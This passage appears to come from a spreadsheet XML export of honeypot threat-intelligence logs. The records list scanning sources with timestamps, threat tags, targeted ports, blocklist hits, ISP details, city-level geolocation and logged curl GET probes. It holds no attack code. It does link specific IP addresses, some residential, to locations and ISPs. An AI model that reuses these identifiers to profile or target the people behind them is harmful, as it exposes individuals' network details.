    <d v="2025-04-04T10:48:34"/>
    <d v="2024-08-06T00:01:00"/>
    <d v="2025-04-04T10:48:34"/>
    <n v="5195"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;9100&amp;&amp;5900&amp;&amp;80&amp;&amp;1384&amp;&amp;23&amp;&amp;61264&amp;&amp;60056&amp;&amp;60110&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:e75d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3202"/>
    <x v="3202"/>
    <s v="NA&amp;&amp;61-220-216-233.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T10:48:14"/>
    <d v="2024-12-15T16:48:09"/>
    <d v="2025-04-04T10:48:14"/>
    <n v="646"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;80&amp;&amp;36967&amp;&amp;52749&amp;&amp;13316&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3ddc:d8e9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3203"/>
    <x v="3203"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:46:58"/>
    <d v="2025-04-04T10:46:58"/>
    <d v="2025-04-04T10:46:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="CMX"/>
    <s v="Mexico City"/>
    <s v="Benito Juárez  Borough"/>
    <s v="Benito Juarez"/>
    <s v="3827406"/>
    <s v="NA"/>
    <s v="19.3984"/>
    <s v="-99.1577"/>
    <s v="28548"/>
    <s v="AS28548"/>
    <s v="Cablevisión, S.A. de C.V."/>
    <s v="consumer"/>
    <s v="Cablevisión, S.A. de C.V"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bdd8:28ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3204"/>
    <x v="3204"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:26:50"/>
    <d v="2024-09-10T00:44:00"/>
    <d v="2025-04-04T10:26:50"/>
    <n v="462"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:b9e4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3205"/>
    <x v="3205"/>
    <s v="c-76-125-131-104.hsd1.pa.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:26:35"/>
    <d v="2025-02-23T21:43:14"/>
    <d v="2025-04-04T10:26:35"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;29573&amp;&amp;52736&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="PA"/>
    <s v="Pennsylvania"/>
    <s v="Indiana"/>
    <s v="Blairsville"/>
    <s v="5180834"/>
    <s v="15717"/>
    <s v="40.4312"/>
    <s v="-79.2609"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4c7d:8368"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3206"/>
    <x v="3206"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:21:20"/>
    <d v="2025-04-02T05:06:14"/>
    <d v="2025-04-04T10:21:20"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="26"/>
    <s v="Busan"/>
    <s v="NA"/>
    <s v="Busan (Chungjang-daero 5beon-gil)"/>
    <s v="1838524"/>
    <s v="NA"/>
    <s v="35.1111"/>
    <s v="129.039"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2008-02-26"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77c6:3411"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3207"/>
    <x v="3207"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T10:17:36"/>
    <d v="2025-04-04T10:17:36"/>
    <d v="2025-04-04T10:17:36"/>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b:e789"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3208"/>
    <x v="3208"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T09:55:44"/>
    <d v="2025-04-04T06:47:03"/>
    <d v="2025-04-04T09:55:44"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Jurong East)"/>
    <s v="1880252"/>
    <s v="609606"/>
    <s v="1.32525"/>
    <s v="103.749"/>
    <s v="4773"/>
    <s v="M1 LIMITED"/>
    <s v="M1 LIMITED"/>
    <s v="business"/>
    <s v="M1 LIMITED"/>
    <s v="1990-03-02"/>
    <s v="M1LIMITED-SG"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8a4b:2242"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3209"/>
    <x v="3209"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T09:41:35"/>
    <d v="2025-04-04T09:41:35"/>
    <d v="2025-04-04T09:41:35"/>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f1:b8cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3210"/>
    <x v="3210"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T09:26:32"/>
    <d v="2025-04-04T09:20:15"/>
    <d v="2025-04-04T09:26:32"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:9955"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3211"/>
    <x v="3211"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T09:15:11"/>
    <d v="2024-12-19T13:16:08"/>
    <d v="2025-04-04T09:15:11"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Thanh Xuân District"/>
    <s v="Thanh Xuân"/>
    <s v="8616118"/>
    <s v="NA"/>
    <s v="20.9947"/>
    <s v="105.8"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.190.233.19,63862)}&amp;&amp;{Data_SMB:Incoming connection (113.190.233.19,64271)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71be:e913"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3212"/>
    <x v="3212"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T08:44:33"/>
    <d v="2025-04-04T06:26:27"/>
    <d v="2025-04-04T08:44:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:857a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3213"/>
    <x v="3213"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T08:17:09"/>
    <d v="2025-04-04T06:09:40"/>
    <d v="2025-04-04T08:17:09"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13725"/>
    <s v="101.693"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="residential"/>
    <s v="Adsl Streamyx"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af8d:c1ae"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3214"/>
    <x v="3214"/>
    <s v="1-34-92-38.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T07:51:24"/>
    <d v="2025-04-04T07:32:57"/>
    <d v="2025-04-04T07:51:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="23&amp;&amp;9100"/>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2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:122:5c26"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3215"/>
    <x v="3215"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T07:44:45"/>
    <d v="2025-04-04T07:39:54"/>
    <d v="2025-04-04T07:44:45"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Kangkar"/>
    <s v="1882402"/>
    <s v="NA"/>
    <s v="1.3761100000000002"/>
    <s v="103.902"/>
    <s v="4773"/>
    <s v="M1 LIMITED"/>
    <s v="M1 LIMITED"/>
